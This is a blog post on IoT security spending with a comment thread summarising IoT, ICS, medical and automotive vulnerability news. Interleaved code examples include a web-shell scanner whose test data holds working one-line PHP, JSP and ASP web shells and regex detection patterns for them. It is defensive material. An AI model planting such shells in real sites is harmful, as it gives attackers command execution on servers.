The 1.5 Billion Dollar Market: IoT Security
The two biggest challenges in 2018 will continue to be protecting against unauthorized access, and patching/updating the software of the device. Companies must not neglect the security problems of IoT and IIoT devices. Cyberattacks on the Internet of Things (IoT) are already a reality.

According to Gartner's market researchers, global spending on IoT security will increase to $1.5 billion this year.


  1. Tomi Engdahl says:

    IoT/ICS Armageddon: hacking devices like there’s no tomorrow (part 1)
    The truth is that hacking OT devices wasn’t challenging enough. Today, like five years ago, the security in the area is running 10/15 years behind the traditional IT sector. In a few words:

  2. Tomi Engdahl says:

    Webinar: Embedded cyber security – regulatory news update

    Watch this session to get a concise overview of the most interesting regulatory news over the first half of 2021 and possible next steps, both from Operational Technology and Consumer IoT perspectives. Also highlights from ETSI Security Week 2021 will be summarized.

  3. Tomi Engdahl says:

    Facebook bans academics who researched ad transparency and misinformation on Facebook
    The researchers say their work is being silenced. Facebook has banned the personal accounts of academics who researched ad transparency and the spread of misinformation on the social network. Facebook says the group violated its terms of service by scraping user data without permission. But the academics say they are being silenced for exposing problems on Facebook’s platform.

    How a fake network pushes pro-China propaganda
    A sprawling network of more than 350 fake social media profiles is pushing pro-China narratives and attempting to discredit those seen as opponents of China’s government, according to a new study. The aim is to delegitimise the West and boost China’s influence and image overseas, the report by the Centre for Information Resilience (CIR) suggests.

  4. Tomi Engdahl says:

    Black Hat: Security Bugs Allow Takeover of Capsule Hotel Rooms
    A researcher was able to remotely control the lights, bed and ventilation in “smart” hotel rooms via Nasnos vulnerabilities.

  5. Tomi Engdahl says:

    Several vulnerabilities found in the NicheStack TCP/IP implementation
    14 vulnerabilities were found in the NicheStack TCP/IP implementation, which is used especially in embedded systems. Two of the now-published vulnerabilities are critical and enable remote command execution. Several manufacturers of embedded systems use this implementation in their own products.

  6. Tomi Engdahl says:

    Value of PLC Key Switch Monitoring to Keep Critical Systems More Secure
    Programmable Logic Controllers (PLC) and Safety Instrumented Systems (SIS) Controllers have historically included an external switch, generally in the form of a key, to perform maintenance and troubleshooting. The key switch has become commonplace for automation engineers and technicians who maintain and support these systems and understand the importance of the little switch in overall device operation and how it affects the underlying process.

  7. Tomi Engdahl says:

    Trusted platform module security defeated in 30 minutes, no soldering required
    Sometimes, locking down a laptop with the latest defenses isn’t enough. Microsoft’s BitLocker, meanwhile, doesn’t use any of the encrypted communications features of the latest TPM standard. That meant if the researchers could tap into the connection between the TPM and the CPU, they might be able to extract the key.

  8. Tomi Engdahl says:

    From stolen laptop to inside the company network
    To recap, we took a locked down FDE laptop, sniffed the BitLocker decryption key coming out of the TPM, backdoored a virtualized image, and used its VPN auto-connect feature to attack the internal corporate network. That is one way to go from stolen laptop to internal compromise.

  9. Tomi Engdahl says:

    2021 Global IoT Trends Report
    We reached out to our global customer base with an IoT survey between September 2020 and December 2020. We got 2,095 completed questionnaires, primarily from engineers of IoT solutions, in 60 countries.

  10. Tomi Engdahl says:

    Scam-baiting YouTube channel Tech Support Scams taken offline by tech support scam
    “So to prove that anyone can be scammed,” Browning announced via Twitter following the attack, “I was convinced to delete my YouTube channel because I was convinced I was talking [to YouTube] support. I never lost control of the channel, but the sneaky s**t managed to get me to delete the channel. Hope to recover soon.”

  11. Tomi Engdahl says:

    Top Routinely Exploited Vulnerabilities
    This Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). This advisory provides details on the top 30 vulnerabilities, primarily Common Vulnerabilities and Exposures (CVEs), routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021.

  12. Tomi Engdahl says:

    The 25 most dangerous software vulnerabilities to watch out for
    Top of the list with the highest score by some margin is CWE-787: Out-of-bounds Write, a vulnerability where software writes past the end, or before the beginning, of the intended buffer. Second in the list is CWE-79: Improper Neutralization of Input During Web Page Generation, a cross-site scripting vulnerability which doesn’t correctly neutralise inputs before they are placed as outputs on a website. Third in the list is CWE-125: Out-of-bounds Read, a vulnerability which can allow attackers to read sensitive information from other memory locations or cause a crash.

    It’s time for a Business Logic API Security Testing Approach
    To do this, you must find ways to simplify and streamline your organization’s API security testing, integrating and enforcing API security testing standards within the development cycle. This way, along with runtime monitoring, the security team can gain visibility into all known vulnerabilities in one place. As a bonus, taking steps to shift-left API security testing will cut costs and accelerate time to remediation.

  13. Tomi Engdahl says:

    Zero trust architecture design principles 1.0 launched.
    The eight principles outlined in our guidance will help you to implement your own zero trust network architecture in an enterprise environment. The principles are: Know your architecture, including users, devices, services and data. Know your User, Service and Device identities. Assess your user behaviour, device and service health. Use policies to authorise requests. Authenticate & Authorise everywhere. Focus your monitoring on users, devices and services. Don’t trust any network, including your own. Choose services designed for zero trust.

  14. Tomi Engdahl says:

    Top Organizations on GitHub Vulnerable to Dependency Confusion Attacks
    On analyzing these repositories, we found that 93 repositories out of the Top 1000 GitHub Organizations are using a package that doesn't exist on a public package index, which can be claimed by an attacker to cause a supply chain attack. On similar lines, we observed that 169 repositories were installing dependencies from a host that isn't reachable over the internet and 126 repositories were installing packages owned by a GitHub/Gitlab user that doesn't exist.

  15. Tomi Engdahl says:

    Significant Historical Cyber-Intrusion Campaigns Targeting ICS
    To raise awareness of the risks to, and improve the cyber protection of, critical infrastructure, CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory as well as updates to five alerts and advisories. These alerts and advisories contain information on historical cyber-intrusion campaigns that have targeted ICS.

  16. Tomi Engdahl says:

    Verifiable design in modern systems
    The way we design and build software is continually evolving. Just as we now think of security as something we build into software from the start, we are also increasingly looking for new ways to minimize trust in that software. One of the ways we can do that is by designing software so that you can get cryptographic certainty of what the software has done. In this post, we’ll introduce the concept of verifiable data structures that help us get this cryptographic certainty. We’ll describe some existing and new applications of verifiable data structures, and provide some additional resources we have created to help you use them in your own applications.
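The post quoted above introduces verifiable data structures without showing one. The following is an added example, not code from the quoted post or from any library: a Merkle tree in the RFC 6962 (Certificate Transparency) shape, with the leaf/node hash prefixes that standard uses, an inclusion-proof generator and a verifier that recomputes the root from a single entry plus its audit path. The sample log entries, the `SAMPLE_LOG` name and the `demo` helper are constructed for illustration.

```python
import hashlib
from typing import List, Tuple

# Domain-separation prefixes for leaf and interior hashes (the RFC 6962
# convention). Without them an interior node could be passed off as a leaf.
LEAF_PREFIX = b"\x00"
NODE_PREFIX = b"\x01"

# Constructed sample log. In a real deployment each entry might be a firmware
# release manifest or a certificate appended to a public, append-only log.
SAMPLE_LOG = [f"firmware-v1.{i}".encode() for i in range(5)]

Proof = List[Tuple[bytes, str]]  # (sibling subtree hash, side the sibling is on)


def hash_leaf(entry: bytes) -> bytes:
    return hashlib.sha256(LEAF_PREFIX + entry).digest()


def hash_node(left: bytes, right: bytes) -> bytes:
    return hashlib.sha256(NODE_PREFIX + left + right).digest()


def _split_point(n: int) -> int:
    """Largest power of two strictly less than n; fixes the tree shape."""
    k = 1
    while k * 2 < n:
        k *= 2
    return k


def merkle_root(entries: List[bytes]) -> bytes:
    if not entries:
        return hashlib.sha256(b"").digest()  # empty-tree hash, as in RFC 6962
    if len(entries) == 1:
        return hash_leaf(entries[0])
    k = _split_point(len(entries))
    return hash_node(merkle_root(entries[:k]), merkle_root(entries[k:]))


def inclusion_proof(entries: List[bytes], index: int) -> Proof:
    """Audit path for entries[index]: sibling hashes from the leaf up to the root."""
    if not 0 <= index < len(entries):
        raise IndexError(index)
    if len(entries) == 1:
        return []
    k = _split_point(len(entries))
    if index < k:
        return inclusion_proof(entries[:k], index) + [(merkle_root(entries[k:]), "right")]
    return inclusion_proof(entries[k:], index - k) + [(merkle_root(entries[:k]), "left")]


def verify_inclusion(entry: bytes, proof: Proof, root: bytes) -> bool:
    """Recompute the root from one entry and its audit path.

    The verifier never sees the other entries; it only needs a root hash it
    already trusts (e.g. one signed by the log operator). Any change to any
    entry, or to the entry being proven, changes the recomputed root.
    """
    h = hash_leaf(entry)
    for sibling, side in proof:
        h = hash_node(sibling, h) if side == "left" else hash_node(h, sibling)
    return h == root


def demo() -> dict:
    """Constructed walk-through: genuine proof, swapped entry, tampered log."""
    root = merkle_root(SAMPLE_LOG)
    proof = inclusion_proof(SAMPLE_LOG, 3)
    tampered = list(SAMPLE_LOG)
    tampered[1] = b"firmware-v1.1-backdoored"
    return {
        "genuine_entry_verifies": verify_inclusion(SAMPLE_LOG[3], proof, root),
        "swapped_entry_fails": verify_inclusion(b"firmware-v9.9", proof, root),
        "tampered_log_changes_root": merkle_root(tampered) != root,
        "proof_size": len(proof),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The proof size grows with log2 of the log size, which is what makes auditing cheap: a client holding only the signed root can check that its own entry is in the log without downloading the log. Consistency proofs between two roots (showing the log is append-only) follow the same pattern but are not shown here.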

  17. Tomi Engdahl says:

    TSA Pipeline Security Guideline Update
    In the United States, CISA identifies 16 critical infrastructure sectors considered vital to our economy and way of life. Energy is one of the critical sectors and is quite literally the lifeline that every other sector depends on. The energy sector is made up of the electric and oil and natural gas subsectors. While the electric subsector has for over a decade had minimum mandatory cybersecurity requirements, there have been understandable challenges in implementing similar standards for the oil and natural gas subsector.

  18. Tomi Engdahl says:

    Web shells: How can we get rid of them and why law enforcement is not really the answer
    Microsoft recorded a total of 144,000 web shell attacks between August 2020 and January 2021. Web shells are very light programmes (scripts) that hackers install to either attack affected websites or web-facing services or prepare a future attack. A web shell allows hackers to execute standard commands on web servers that have been compromised. Web shells use code such as PHP, JSP or ASP for this purpose. When the web shells are successfully installed, the hackers are able to execute the same commands as the administrators of the website can. They can also execute commands that steal data, install malicious code and provide system information that allows hackers to penetrate deeper into networks.
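The comment above describes what a web shell is (PHP, JSP or ASP that hands request parameters to an interpreter or shell) without showing how to find one. Below is an added example, not code from the quoted article or from Microsoft: a content-based scanner that walks a set of web-root files and flags the "attacker input straight into eval/exec" pattern in all three languages, plus the `eval(base64_decode('...'))` obfuscation that one-line PHP shells commonly use. The file paths, the file contents in `SAMPLE_FILES` and the rule set are constructed for this example; a production scanner would layer entropy, file-timestamp and baseline-hash checks on top.

```python
import base64
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, int, str]  # (rule name, line number, offending line)

# Each rule targets the defining behaviour of a web shell: request data handed
# directly to an interpreter or a shell. Constructed for this example and kept
# narrow on purpose, so ordinary code that merely reads $_GET does not fire.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("php-eval-of-request", re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13|stripslashes)?\s*\(?\s*"
        r"\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("php-shell-of-request", re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
        r"\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("php-eval-of-encoded-blob", re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(\s*"
        r"['\"][A-Za-z0-9+/=]{40,}", re.I)),
    ("php-dynamic-call-of-request", re.compile(
        r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I)),
    ("jsp-exec-of-request", re.compile(
        r"Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter", re.I)),
    ("asp-eval-of-request", re.compile(
        r"\b(?:eval|execute)\s*\(?\s*request\s*(?:\(|\.)", re.I)),
]

# Constructed sample web roots: one benign page and four planted shells.
_BLOB = base64.b64encode(b"if(isset($_POST['x'])){system($_POST['x']);}").decode()
SAMPLE_FILES: Dict[str, str] = {
    "var/www/html/index.php":
        "<?php\nrequire 'lib.php';\necho htmlspecialchars($_GET['name'] ?? 'guest');\n",
    "var/www/html/images/.cache.php":
        "<?php @eval($_POST['cmd']); ?>",
    "var/www/html/uploads/tmp.php":
        "<?php\n// harmless-looking header\neval(base64_decode('" + _BLOB + "'));\n",
    "opt/tomcat/webapps/ROOT/help.jsp":
        '<%@ page import="java.io.*" %>\n'
        '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "inetpub/wwwroot/uploads/x.asp":
        '<%eval request("pass")%>',
}


def scan_source(source: str) -> List[Finding]:
    """Run every rule over every line; report rule, 1-based line and a snippet."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((name, lineno, line.strip()[:80]))
    return findings


def scan_files(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan by content, not by extension: shells hide as .cache.php in image dirs."""
    report: Dict[str, List[Finding]] = {}
    for path, source in files.items():
        hits = scan_source(source)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        for rule, lineno, snippet in hits:
            print(f"{path}:{lineno}: {rule}: {snippet}")
```

Scanning by content rather than by file name matters because the paths above are typical hiding places (upload and image directories, dot-files). Pair this with a baseline of known-good file hashes so that a new or modified script under the web root is itself a finding, whether or not a rule matches it.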

  19. Tomi Engdahl says:

    The Challenges of Vulnerability Management in OT Environments
    After careful analysis and field validation, Dragos has found that publicly announced vulnerability severity scores are often inaccurate, incomplete and lack both context and guidance. This means that industrial teams are struggling with how to interpret and apply them in their environments and spending too much time chasing the wrong issues. Whitepaper at

  20. Tomi Engdahl says:

    August 2021 ICS Patch Tuesday: Siemens, Schneider Address Over 50 Flaws

    Siemens and Schneider Electric on Tuesday released 18 security advisories addressing a total of more than 50 vulnerabilities affecting their products.

    The vendors have provided patches, mitigations, and general security recommendations for reducing the risk of attacks.

  21. Tomi Engdahl says:

    Leading Threat to Industrial Security is Not What You Think

    As attackers become more sophisticated, so do their attacks. This in turn exposes threat vectors that once were thought to be well protected, or at least not interesting enough to attack. Nowhere is this truer than in industrial control systems (ICS) environments.

    The growing practice of connecting ICS to enterprise networks and the internet, driven by technologies such as IoT, edge computing and analytics platforms, has put ICS on the radar of cybercriminals.

    ICS attacks can cause severe problems, ranging from supply chain disruption to physical damage to components and subsystems. What’s more, ICS traffic often contains proprietary data or information that has intrinsic value to business processes or workflows.

    Securing ICS is more challenging than protecting traditional IT environments since ICS is insecure by design. ICS was originally conceived to be siloed from other IT systems, shared IT infrastructure and the outside world. These closed systems were considered immune from external threats, simply because they were “air gapped”.

    Advances in IoT technologies and other IT centric systems made it logical to connect ICS to IT to garner numerous benefits. However, very few considered the implications of that connectivity, which cybercriminals are able to exploit. Especially the native insecurities of ICS, such as limited policies, a lack of access control provisions, weak password enforcement and infrequent patching. Perhaps the biggest threat to ICS is the fact that utility companies are such large targets – they are well known, cover large geographic areas, and their critical locations are all very public.

    Consider the following attack vectors that can impact ICS.

    Brute force attacks against weak passwords are something IT pros have been dealing with for years and have developed countermeasures against. However, most ICS systems lack policies around passwords, meaning that attacks may go unnoticed or unrecorded. Here, ICS operators need to learn what constitutes a brute force attack, identify the signs of such an attack, and implement controls to prevent damage. Processes that require knowledge, action, and response. Those processes must be taught.

    Another attack vector is false data injection, whose primary goal is to disrupt ICS processes. In the IT world, DDoS (Distributed Denial of Service) attacks are focused on disruption. However, with ICS false data injection may take on a different characteristic, one that not only disrupts processing, but potentially damages physical equipment, or cascades to other devices. ICS operators must learn how to monitor for those types of attacks, create policies that can stem them, and remediate vulnerabilities they exploit.

    Other attack vectors ICS is susceptible to include buffer overflows, command injection, PLC programming modifications, and many more. Dealing with those attacks requires knowledge of both ICS and IT, meaning that ICS operators must achieve the same level of cyber competency as their IT counterparts, while also applying their knowledge of the intricacies of ICS.

    Simply put, organizations must put in place plans and policies to adequately train those that manage ICS, build realistic scenarios, and also provide a layer of anonymity for those responding to those threats.
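The comment above says ICS operators must learn what a brute-force attack looks like in their own logs and build controls around it. As an added example (not code from the quoted article), here is the minimal detection logic a team could run over authentication logs from an HMI or engineering workstation: a per-source sliding window that raises one alert when failed logins cross a threshold, and a second, higher-priority alert when a source that is still over the threshold then logs in successfully. The log lines, hostnames, addresses and account names in `SAMPLE_LOG` are constructed in OpenSSH's auth-log format for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Optional, Tuple

# Constructed sample: OpenSSH-style auth lines from an engineering workstation
# (ews01) and an HMI (hmi01). All names and addresses are invented.
SAMPLE_LOG = """\
2021-08-10T14:00:00Z ews01 sshd[2101]: Failed password for operator from 192.168.10.20 port 50110 ssh2
2021-08-10T14:00:07Z ews01 sshd[2101]: Accepted password for operator from 192.168.10.20 port 50110 ssh2
2021-08-10T14:02:00Z hmi01 sshd[3300]: Failed password for invalid user admin from 10.20.30.5 port 51000 ssh2
2021-08-10T14:02:03Z hmi01 sshd[3301]: Failed password for invalid user root from 10.20.30.5 port 51001 ssh2
2021-08-10T14:02:05Z hmi01 sshd[3302]: Failed password for operator from 10.20.30.5 port 51002 ssh2
2021-08-10T14:02:09Z hmi01 sshd[3303]: Failed password for operator from 10.20.30.5 port 51003 ssh2
2021-08-10T14:02:12Z hmi01 sshd[3304]: Failed password for operator from 10.20.30.5 port 51004 ssh2
2021-08-10T14:02:20Z hmi01 sshd[3305]: Failed password for operator from 10.20.30.5 port 51005 ssh2
2021-08-10T14:02:31Z hmi01 sshd[3306]: Accepted password for operator from 10.20.30.5 port 51006 ssh2
2021-08-10T14:05:00Z plc-gw sshd[4000]: Connection closed by 10.20.30.9 port 40000
""".splitlines()

AUTH_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3})"
)

Alert = Tuple[str, str, str, str]  # (kind, source ip, target host, detail)


def parse_auth_line(line: str) -> Optional[dict]:
    """Return the fields of an authentication event, or None for other lines."""
    m = AUTH_RE.match(line)
    if m is None:
        return None  # e.g. "Connection closed": not an auth outcome, skip it
    return {
        "ts": datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
        "host": m["host"], "result": m["result"],
        "user": m["user"], "src": m["src"],
    }


def detect_brute_force(lines: List[str], threshold: int = 5,
                       window: timedelta = timedelta(seconds=60)) -> List[Alert]:
    """Sliding-window failure counter keyed by source IP.

    Keying by source rather than by account means password spraying across
    many users is counted too. BRUTE_FORCE fires once when the threshold is
    reached; SUCCESS_AFTER_BRUTE_FORCE fires when the same source, still over
    the threshold, then authenticates, which is the likely compromise.
    """
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    alerts: List[Alert] = []
    for line in lines:
        ev = parse_auth_line(line)
        if ev is None:
            continue
        recent = failures[ev["src"]]
        while recent and ev["ts"] - recent[0] > window:
            recent.popleft()  # drop failures that have aged out of the window
        if ev["result"] == "Failed":
            recent.append(ev["ts"])
            if len(recent) == threshold:
                alerts.append(("BRUTE_FORCE", ev["src"], ev["host"],
                               f"{threshold} failures within {int(window.total_seconds())}s, "
                               f"last user {ev['user']}"))
        elif len(recent) >= threshold:
            alerts.append(("SUCCESS_AFTER_BRUTE_FORCE", ev["src"], ev["host"],
                           f"login as {ev['user']} after {len(recent)} recent failures"))
    return alerts


if __name__ == "__main__":
    for alert in detect_brute_force(SAMPLE_LOG):
        print(" | ".join(alert))
```

The thresholds are the operational decision the comment is pointing at: on a flat OT network where a maintenance account legitimately mistypes a password twice a shift, five failures in a minute is already anomalous, and a success from the same source inside that window should page someone rather than just log.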

  22. Tomi Engdahl says:

    Philips study finds hospitals struggling to manage thousands of IoT devices
    Working with cybersecurity company CyberMDX, researchers with Philips surveyed 130 IT healthcare decision-makers to figure out how they were managing the thousands of medical devices that populate most hospitals today.

  23. Tomi Engdahl says:

    What Is Zero Trust and Why Does It Matter?
    As the remote workforce expanded, so did the attack surface for cybercriminals, forcing security teams to pivot their strategy to effectively protect company resources. During this time of change, the hype around Zero Trust increased, but with several different interpretations of what it was and how it helps. Eric Skinner from Trend Micro gets real about the true intent of Zero Trust and how you can use it to better protect your organization.

  24. Tomi Engdahl says:

    How ‘shift left’ helps secure today’s connected embedded systems – EDN
    DevSecOps—which stands for development security operations—expands on DevOps principles with a “shift left” principle, designing and testing for security early and continuously in each software iteration.
    Defense-in-depth and the process model
    Traditionally, the practice for secure embedded code verification has been largely reactive. Code is developed in accordance with relatively loose guidelines and then subjected to performance, penetration, load, and functional testing to identify vulnerabilities.
    A more proactive approach ensures code is secure by design. That implies a systematic development process, where the code is written in accordance with secure coding standards, is traceable to security requirements, and is tested to demonstrate compliance with those requirements as development progresses.
    One interpretation of this proactive approach integrates security-related best practices into the V-model software development lifecycle that is familiar to developers in the functional safety domain. The resulting secure software development life cycle (SSDLC) represents a shift left for security-focused application developers, ensuring that vulnerabilities are designed out of the system (Figure 1).
    Shift left: What it means
    The concepts behind the “shift left” principle should be familiar to anyone developing safety-critical applications because for many years, functional safety standards have demanded a similar approach. Consequently, the following best practices proven in the functional safety domain apply to security-critical applications as well:
    Establish requirements at the outset
    Undocumented requirements lead to miscommunication on all sides and create rework, changes, bug fixes, and security vulnerabilities. To ensure smooth project development, all team members must understand in the same way all parts of the product and the process of its development. Clearly defined functional and security requirements help ensure they do.

  25. Tomi Engdahl says:

    Value of PLC Key Switch Monitoring to Keep Critical Systems More Secure

  26. Tomi Engdahl says:

    ”Kill switch” revealed: Samsung blacked out televisions via remote management
    South Africa demonstrates, in a rare way, what kind of power a manufacturer can have over its own devices.

  27. Tomi Engdahl says:

    Vulnerabilities Allow Hackers to Tamper With Doses Delivered by Medical Infusion Pumps

    McAfee security researchers, in partnership with Culinda, identified a series of severe vulnerabilities in B. Braun’s Infusomat Space large volume infusion pump and SpaceStation system that they claim could potentially lead to dispensing potentially lethal doses of medication.

    A total of five vulnerabilities were identified, the most severe of which carries a CVSS score of 9.7 and is tracked as CVE-2021-33885. The issue exists because the device doesn’t verify who is sending the commands, thus allowing a remote, unauthenticated attacker to send input to the device, which will use it instead of the correct data.

    Next in line is CVE-2021-33886 (CVSS score of 8.2), where proprietary networking commands aren’t properly authenticated, thus allowing an attacker to reconfigure the device remotely.

    The remaining three issues include CVE-2021-33886 (CVSS score of 7.7), which allows an attacker to gain user level command line access, CVE-2021-33883 (CVSS score of 7.1), where sensitive information is transmitted in clear text, and CVE-2021-33884 (CVSS score of 5.8), where an attacker could upload files to a directory.

  28. Tomi Engdahl says:

    Engineering Workstations Are Concerning Initial Access Vector in OT Attacks

    Organizations that use industrial control systems (ICS) and other operational technology (OT) are increasingly concerned about cyber threats, and while they have taken steps to address risks, many don’t know if they have suffered a breach, according to a survey conducted by the SANS Institute on behalf of industrial cybersecurity firm Nozomi Networks.

    The SANS 2021 OT/ICS Cybersecurity Report is based on information provided by 480 individuals from a wide range of industries.

    The survey conducted by SANS showed that nearly 70% of respondents believe the risk to their OT environment is high or severe, which is a significant increase from the 51% in 2019, when SANS conducted a similar survey.

  29. Tomi Engdahl says:

    Flaws in John Deere Systems Show Agriculture’s Cyber Risk
    John Deere, Researchers Spar Over Impact of Vulnerabilities

  30. Tomi Engdahl says:

    Hacker Claims Honda And Acura Vehicles Vulnerable To Simple Replay Attack

    Keyless entry has become a standard feature on virtually all cars, where once it was a luxury option. However, it’s also changed the way that thieves approach the process of breaking into a car. After recent research, [HackingIntoYourHeart] claims that many modern Honda and Acura vehicles can be accessed with a simple replay attack using cheap hardware.

    It’s a bold claim, and one that we’d love to see confirmed by a third party. The crux of the allegations are that simply recording signals from a Honda or Acura keyfob is enough to compromise the vehicle. Reportedly, no rolling code system is implemented and commands can easily be replayed.
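The post above rests on one distinction: a fob that sends the same frame every time can be recorded and replayed, while a rolling-code fob cannot. The following is an added example, not code from the Hackaday post and not any vehicle's actual protocol: a simulation of both receivers, with the attacker's capture-and-replay against each. The rolling-code scheme here is a simplified model (fob id, per-press counter and a truncated HMAC under a shared key, with an acceptance window for presses the car never heard); production systems such as KeeLoq encrypt the counter with a block cipher instead, but the replay-rejection logic is the same. The key, fob id, command codes and window size are constructed values.

```python
import hashlib
import hmac
import struct
from typing import Tuple

UNLOCK, LOCK = 0x01, 0x02

# Constructed values for the example only.
SHARED_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
FOB_ID = 0x0BADF00D


class FixedCodeFob:
    """Transmits an identical frame for the same button every time."""
    def __init__(self, code: int):
        self.code = code

    def press(self, cmd: int) -> bytes:
        return struct.pack(">IB", self.code, cmd)


class FixedCodeReceiver:
    def __init__(self, code: int):
        self.code = code

    def receive(self, frame: bytes) -> bool:
        if len(frame) != 5:
            return False
        code, _cmd = struct.unpack(">IB", frame)
        return code == self.code  # a recording is indistinguishable from a real press


def _tag(key: bytes, body: bytes) -> bytes:
    """64-bit truncated HMAC-SHA256 over id || counter || cmd."""
    return hmac.new(key, body, hashlib.sha256).digest()[:8]


class RollingCodeFob:
    """Frame = id || counter || cmd || tag; the counter advances on every press."""
    def __init__(self, fob_id: int, key: bytes):
        self.fob_id, self.key, self.counter = fob_id, key, 0

    def press(self, cmd: int) -> bytes:
        self.counter += 1
        body = struct.pack(">IIB", self.fob_id, self.counter, cmd)
        return body + _tag(self.key, body)


class RollingCodeReceiver:
    def __init__(self, fob_id: int, key: bytes, window: int = 16):
        self.fob_id, self.key, self.window, self.last = fob_id, key, window, 0

    def receive(self, frame: bytes) -> bool:
        if len(frame) != 17:
            return False
        body, tag = frame[:9], frame[9:]
        if not hmac.compare_digest(_tag(self.key, body), tag):
            return False  # forged or corrupted frame
        fob_id, counter, _cmd = struct.unpack(">IIB", body)
        if fob_id != self.fob_id:
            return False
        if not self.last < counter <= self.last + self.window:
            return False  # counter <= last: replay; counter too far ahead: needs resync
        self.last = counter
        return True


def simulate_replay(fob, receiver) -> Tuple[bool, bool]:
    """Attacker records one legitimate unlock, then plays it back later."""
    recorded = fob.press(UNLOCK)
    accepted_live = receiver.receive(recorded)
    accepted_replay = receiver.receive(recorded)
    return accepted_live, accepted_replay


def simulate_lost_presses(missed: int, window: int = 16) -> bool:
    """Fob pressed `missed` times out of range; is the next press still accepted?"""
    fob = RollingCodeFob(FOB_ID, SHARED_KEY)
    receiver = RollingCodeReceiver(FOB_ID, SHARED_KEY, window=window)
    for _ in range(missed):
        fob.press(UNLOCK)
    return receiver.receive(fob.press(UNLOCK))


if __name__ == "__main__":
    print("fixed code   (live, replay):", simulate_replay(FixedCodeFob(FOB_ID), FixedCodeReceiver(FOB_ID)))
    print("rolling code (live, replay):", simulate_replay(RollingCodeFob(FOB_ID, SHARED_KEY),
                                                          RollingCodeReceiver(FOB_ID, SHARED_KEY)))
```

The acceptance window is the usual trade-off: wide enough that a fob pressed in a pocket does not desynchronise the car, narrow enough that a recorded frame cannot be held back and replayed after the counter has moved on. Confirming the claim in the post would mean capturing two unlock frames from the same fob and checking whether the bytes differ at all.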

  31. Tomi Engdahl says:

    Grim prediction: Cyber murders will become reality within 4 years
    Gartner Predicts By 2025 Cyber Attackers Will Have Weaponized Operational Technology Environments to Successfully Harm or Kill Humans
    Organizations Can Reduce Risk by Implementing a Security Control Framework
    By 2025, cyber attackers will have weaponized operational technology (OT) environments to successfully harm or kill humans, according to Gartner, Inc.
    Attacks on OT – hardware and software that monitors or controls equipment, assets and processes – have become more common. They have also evolved from immediate process disruption such as shutting down a plant, to compromising the integrity of industrial environments with intent to create physical harm. Other recent events like the Colonial Pipeline ransomware attack have highlighted the need to have properly segmented networks for IT and OT.
    “In operational environments, security and risk management leaders should be more concerned about real world hazards to humans and the environment, rather than information theft,” said Wam Voster, senior research director at Gartner. “Inquiries with Gartner clients reveal that organizations in asset-intensive industries like manufacturing, resources and utilities struggle to define appropriate control frameworks.”
    Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach over $50 billion by 2023. Even without taking the value of human life into account, the costs for organizations in terms of compensation, litigation, insurance, regulatory fines and reputation loss will be significant. Gartner also predicts that most CEOs will be personally liable for such incidents.

  32. Tomi Engdahl says:

    Samsung Can Remotely Disable Any of Its TVs Worldwide
    The technology is called TV Block, and it’s pre-loaded on every Samsung TV.

    On July 11, a distribution center located in KwaZulu-Natal, South Africa was looted and an unknown number of Samsung televisions were stolen. However, all of those TVs are now useless as Samsung has revealed they are fitted with remote blocking technology.

    What you may be surprised to hear is that Samsung can do this to any of its TVs, regardless of where they are in the world. The company admitted as much in its latest Samsung Newsroom post detailing how the TVs in South Africa were stolen and then disabled.

    The technology is called TV Block and it’s “pre-loaded on all Samsung TV products.” Whenever a TV is confirmed as being stolen, Samsung logs the serial number of the TV and then waits for it to be connected to the internet. At that point a Samsung server is connected to by default, the serial number is checked, and if it’s on the list, “the blocking system is implemented, disabling all the television functions.”

  33. Tomi Engdahl says:

    IoT Attacks Skyrocket, Doubling in 6 Months
    According to a Kaspersky analysis of its telemetry from honeypots shared with Threatpost, the firm detected more than 1.5 billion IoT attacks up from 639 million during the previous half year, which is more than twice the volume.

  34. Tomi Engdahl says:

    New maritime cybersecurity guidance for shipping companies and vessels
    The Finnish Shipowners' Association (Suomen Varustamot ry) and the Water Transport Pool (Vesikuljetuspooli), part of the National Emergency Supply Organisation, have published a cybersecurity best-practices guide for shipping companies and vessels. The guidance is based on an extensive joint study of maritime cybersecurity.

  35. Tomi Engdahl says:

    The ISO/SAE 21434 standard is the start of a long and tenuous journey that will inevitably see many design challenges along the way.

    ISO/SAE 21434 auto cybersecurity standard: Dawn of a new era?

    The news about NXP Semiconductors certified by TÜV SÜD to comply with the new automotive cybersecurity standard ISO/SAE 21434 is the harbinger of a new era that could be reminiscent of how the ISO 26262 functional safety standard reshaped the automotive industry during the past decade. NXP claims to be the first chipmaker to have complied with the ISO/SAE 21434 standard.

